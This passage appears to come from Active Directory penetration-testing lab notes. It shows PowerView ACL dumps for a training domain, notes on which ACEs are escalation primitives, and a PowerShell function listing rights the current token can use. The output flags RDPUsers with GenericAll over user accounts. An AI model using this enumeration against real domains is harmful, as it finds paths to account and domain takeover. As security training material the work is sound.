SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 917951
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 917951
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983487
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 131220
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

Getting Interesting Domain ACLs

What makes an ACE interesting:

An ACE is interesting when it grants a security principal rights that can change the target object rather than just read it: GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, CreateChild/DeleteChild, or an allowed ExtendedRight (for example User-Force-Change-Password, or the DS-Replication-Get-Changes rights on the domain head). Read-only rights such as ReadProperty, GenericRead and ListChildren, which make up most of the output above, are not.

Find-InterestingDomainAcl walks the DACL of every object in the domain and keeps only such ACEs whose trustee has a non-default RID (1000 or higher), so built-in principals like BUILTIN\Administrators, Pre-Windows 2000 Compatible Access, Everyone and the well-known *-512/-519 groups are filtered out. Expect it to take a while in a large domain, and expect noise: in the output below every student machine account has GenericAll over its own "Windows Virtual Machine" child object, the serviceConnectionPoint that Hyper-V creates under a virtual machine's computer object. That is the default and not an escalation path. The entries worth chasing are user or group trustees with modification rights over objects they do not own.
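PowerView prints every ACE on the object, which is more than a tester usually wants; the practical question is which of those ACEs the current token can actually use. The following PowerShell function is an added example, not PowerView code and not part of the lab notes. It reads an object's DACL directly through System.DirectoryServices, keeps only allowed, non-inherit-only ACEs whose trustee SID is present in the current token, and decodes the AccessMask into the same ActiveDirectoryRights names seen above. It assumes a domain-joined host with a reachable DC; the function name, parameters and the $SearchBase value are illustrative.

```powershell
# Added example (not PowerView and not from the lab notes): read an object's DACL through
# System.DirectoryServices and keep the ACEs the *current* token can actually use.
# Assumptions (hypothetical): a domain-joined host, a reachable DC, and any LDAP path as
# $SearchBase, e.g. "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local".

function Get-UsableAce {
    param(
        [Parameter(Mandatory = $true)] [string] $SearchBase,
        [switch] $IncludeReadOnly    # default: report only rights that can modify the object
    )

    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # Group SIDs in the token are already expanded, so nested groups and well-known SIDs
    # (Everyone S-1-1-0, Authenticated Users S-1-5-11, ...) are covered by this list.
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    $entry = New-Object System.DirectoryServices.DirectoryEntry($SearchBase)
    $dn    = $entry.Properties['distinguishedName'].Value

    # Principal Self (S-1-5-10) ACEs apply only when the caller *is* the object.
    $sidBytes = $entry.Properties['objectSid'].Value
    if ($sidBytes) {
        $objSid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
        if ($objSid.Value -eq $id.User.Value) { $mySids += 'S-1-5-10' }
    }

    # Rights that change the object or invoke an extended right on it.
    # ReadProperty, GenericRead, ListChildren etc. are deliberately absent.
    $modifyMask = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, Self, ExtendedRight, CreateChild, DeleteChild, Delete'

    # DACL only; trustees are returned as SIDs so they compare directly against the token.
    $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($mySids -notcontains $ace.IdentityReference.Value) { continue }
        # InheritOnly ACEs apply to children of this object, not to the object itself.
        if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }

        $rights   = $ace.ActiveDirectoryRights
        $modifies = ([int]$rights -band [int]$modifyMask) -ne 0
        if (-not $modifies -and -not $IncludeReadOnly) { continue }

        [pscustomobject]@{
            ObjectDN    = $dn
            Trustee     = $ace.IdentityReference.Value
            Rights      = $rights.ToString()   # e.g. "ReadProperty, WriteProperty"
            AccessMask  = [int]$rights         # the raw mask PowerView prints, e.g. 48
            ObjectType  = $ace.ObjectType      # property / extended-right GUID; all zeros = every property or right
            Modifies    = $modifies
            IsInherited = $ace.IsInherited
        }
    }
}

# Usage: run as the low-privileged user and point it at the object under review.
# Get-UsableAce -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" | Format-List
```

Two things to keep in mind when reading the results. First, an ExtendedRight or WriteProperty ACE is only as interesting as its ObjectType: User-Change-Password granted to Everyone and Principal Self (seen on the Domain Admins object above) is the default and still requires the old password, whereas User-Force-Change-Password, the DS-Replication-Get-Changes rights on the domain head, or WriteProperty on Member or ms-DS-Key-Credential-Link are real escalation primitives; this function leaves the GUID raw, so resolve it with PowerView's -ResolveGUIDs or a schemaIDGUID lookup. Second, comparing against the token rather than the user's direct group list is deliberate: AD evaluates access against the token, so a right held through a nested group or through Authenticated Users shows up here exactly as the DC would see it.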
PS C:\Users\student163> Find-InterestingDomainAcl -ResolveGUIDs

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STDADMIN,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4202
IdentityReferenceName : DCORP-STDADMIN$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STDADMIN,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD161,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13681
IdentityReferenceName : DCORP-STD161$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD161,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD162,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13682
IdentityReferenceName : DCORP-STD162$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD162,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD163,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13683
IdentityReferenceName : DCORP-STD163$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD163,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD164,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13684
IdentityReferenceName : DCORP-STD164$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD164,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD165,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13685
IdentityReferenceName : DCORP-STD165$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD165,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD166,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13686
IdentityReferenceName : DCORP-STD166$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD166,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD168,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13687
IdentityReferenceName : DCORP-STD168$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD168,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD167,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13688
IdentityReferenceName : DCORP-STD167$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD167,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD169,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13689
IdentityReferenceName : DCORP-STD169$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD169,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD170,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13690
IdentityReferenceName : DCORP-STD170$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD170,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD171,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13691
IdentityReferenceName : DCORP-STD171$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD171,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD172,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13692
IdentityReferenceName : DCORP-STD172$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD172,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD173,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13693
IdentityReferenceName : DCORP-STD173$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD173,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD174,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13694
IdentityReferenceName : DCORP-STD174$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD174,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD175,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13695
IdentityReferenceName : DCORP-STD175$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD175,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD176,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13696
IdentityReferenceName : DCORP-STD176$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD176,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD177,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13697
IdentityReferenceName : DCORP-STD177$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD177,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD178,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13698
IdentityReferenceName : DCORP-STD178$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD178,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD180,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13699
IdentityReferenceName : DCORP-STD180$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD180,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-STD179,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13700
IdentityReferenceName : DCORP-STD179$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD179,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1105
IdentityReferenceName : DCORP-ADMINSRV$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : user

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1108
IdentityReferenceName : DCORP-MGMT$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-MSSQL,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1109
IdentityReferenceName : DCORP-MSSQL$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-MSSQL,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-SQL1,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1110
IdentityReferenceName : DCORP-SQL1$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-SQL1,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1106
IdentityReferenceName : DCORP-APPSRV$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-CI,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1107
IdentityReferenceName : DCORP-CI$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-CI,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Control161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
